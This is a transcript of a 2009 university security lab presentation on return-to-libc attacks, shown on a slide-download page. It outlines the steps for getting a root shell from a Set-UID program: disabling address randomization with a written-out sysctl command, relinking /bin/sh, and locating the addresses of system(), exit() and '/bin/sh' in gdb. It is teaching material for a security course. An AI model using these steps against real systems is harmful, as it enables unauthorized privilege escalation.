1 / 12

Return-to-libc Lab

Return-to-libc Lab. Zutao Zhu 09/25/2009. Outline. Review Set-UID assignment Discuss on Buffer-overflow Lab Return-to-libc. Review Set-UID assignment. Capture screen, please. Need to describe and explain in detail about the assignment

kiana
Download Presentation

Return-to-libc Lab

An Image/Link below is provided (as is) to download presentation Download Policy: Content on the Website is provided to you AS IS for your information and personal use and may not be sold / licensed / shared on other websites without getting consent from its author. Content is provided to you AS IS for your information and personal use only. Download presentation by click this link. While downloading, if for some reason you are not able to download a presentation, the publisher may have deleted the file from their server. During download, if you can't get a presentation, the file might be deleted by the publisher.

E N D

Presentation Transcript

  1. Return-to-libc Lab Zutao Zhu 09/25/2009

  2. Outline • Review Set-UID assignment • Discuss on Buffer-overflow Lab • Return-to-libc

  3. Review Set-UID assignment • Capture screen, please. • Need to describe and explain in detail about the assignment • To prove you have root privilege, using printf(“This is my ls\n”) is not enough • “Make myprog a Set-UID root program, and run it in the root account.”

  4. Review Set-UID assignment • Refer to lecture note: "To make sure Set-UID programs are safe from the manipulation of the LD PRELOAD environment variable, the runtime linker/loader (ld.so) will ignore this environment variable if the program is a Set-UID root program, unless the real UID is also zero."

  5. Buffer-overflow • The shell code in the stack is executed from low memory address to the high memory address. • Use “disassemble main” to see the order

  6. Buffer-overflow • Stack frame for stack.c • Use “info frame” and make sure you are inside the function call you are interested in.

  7. Return-to-libc • How to get the address of “system(), exit()” system call? • How to expose some strings in memory? • How to get the exposed string’s address? • How to provide parameters for system calls?

  8. Return-to-libc • Step 1. /sbin/sysctl -w kernel.randomize_va_space=0 • Step 2. link /bin/sh to /bin/zsh • Step 3. expose “/bin/sh” to the memory • Step 4. use gdb to get the address of “system()” and “exit()”. • Step 5. get the address of “/bin/sh” • Step 6. calculate the offset

  9. Return-to-libc • Chain the system call together

  10. Return-to-libc • Use “id” to check the current user information

  11. Reference • http://www.infosecwriters.com/text_resources/pdf/return-to-libc.pdf • http://milw0rm.org/papers/31

  12. Questions?

More Related